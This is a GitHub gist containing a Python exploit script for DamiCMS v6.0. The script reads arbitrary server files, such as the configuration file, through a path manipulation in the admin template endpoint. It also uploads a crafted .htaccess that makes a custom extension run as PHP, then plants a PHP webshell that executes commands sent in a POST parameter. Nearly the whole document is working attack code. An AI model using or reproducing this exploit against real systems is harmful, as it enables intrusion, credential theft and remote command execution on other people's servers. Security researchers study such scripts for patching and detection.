Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
DamiCMS v6.0 - Read Arbitrary File / Upload Custom PHPWebshell
#!/usr/bin/env python
#coding: utf-8
# Vendor Homepage: https://www.damicms.com/
# Software Link: https://www.damicms.com/downes/dami.rar
# Version: DAMICMS_V6.0.0
# Tested on: Debian 8 / XAMPP
from sys import argv,exit #Receive arguments from CLI
from requests import get,post
from bs4 import BeautifulSoup
def Cookies_Split(galleta=""):
ddict={}
if galleta=="":
exit()
galleta=galleta.split(';')#Split cookies by semicolon
for attribute in galleta:
key=attribute.split('=')[0]
value=attribute.split('=')[1]
ddict[key]=value
return ddict
def Create_File(co=""):
cookie=Cookies_Split(co)
#As php extension is not allowed, it is possible to abuse of AllowOverride Apache's configuration
#By uploading a customed .htaccess in the app's root directory and then upload an additional file to be handled as PHP code
file_htAccess={
'filename':(None,'./.htaccess'),
'submit':(None,'')
}
#If .htaccess alredy exists copy the content just should be added
ht=Read_File(co=co,f='|.htaccess',r=False)
if len(ht)>0:
print ".htaccess file already exists\n Copying its content"
file_htAccess['content']=(None,ht+'AddType application/x-httpd-php .d^_^b\n')
else:
print ".htacess does not exist and going to be created"
file_htAccess['content']=(None,'AddType application/x-httpd-php .d^_^b\n')
print "[+] Uploading .htaccess File"
sleep(2)
req=post(url=target+"/admin.php?s=/Tpl/Update.html",cookies=cookie,files=file_htAccess)
file_phpWebShell={
'filename':(None,'./.aabout.d^_^b'),# Edit to write arbitrary file
'content':(None,'<?php error_reporting(0);$dmc=$_POST["dmc"]; echo "<pre>".shell_exec($dmc)."</pre>";?>'),
'submit':(None,'')
}
print "[+] Uploading php_webshell File"
sleep(3)
req=post(url=target+"/admin.php?s=/Tpl/Update.html",cookies=cookie,files=file_phpWebShell)
return """[+] PHPshell uploaded\n Try sending dmc=<command> to {0}{1} using POST""".format(target,file_phpWebShell['filename'][1])
#The Application has a weird behavior that replaces slashes for pipes and dots for asterisks
def Replace_Chars(path="",new_slash="|",new_dot="*"):
p_tmp_first=path.split('/')[0:-1]
p_tmp_last=path.split('/')[-1].replace('.',new_dot)
path='|'.join(p_tmp_first)+'|'+p_tmp_last
print path
return path
#return path
def Read_File(co="",f="",r=True):
if len(f)<1:
f="/Public/Config/config.ini.php"
if r is True:
f=Replace_Chars(f)
cookie=Cookies_Split(co)
print "Attempting Reading File"
print target+"/admin.php?s=Tpl/Add/id/."+f
#/Web/Tpl is mandatory
req=get(url=target+"/admin.php?s=Tpl/Add/id/."+f,cookies=cookie)
soup = BeautifulSoup(req.content, 'html.parser')
ctent = soup.find_all(id="Content")[0].get_text()
if len(ctent)<1:
print "Something wrong, perhaps file does not exist or it does not have read permissions"
return ctent
if __name__=="__main__":
f=""
if len(argv)<3:
print """Examples:
{0} <url> <cookie> shell (To Trying upload a PHPshell)
{0} <url> <cookie> <remote file to read> (To read arbitrary file)""".format(argv[0])
exit()
elif len(argv)==4:
f=argv[3]
target=""
target=argv[1]
c=argv[2]
#Abusing htaccess AllowOverride configuration
if 'shell' in f.lower():
rr=Create_File(c)
print rr
#Read arbitrary file
else:
F_ile=Read_File(c,f)
print F_ile
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.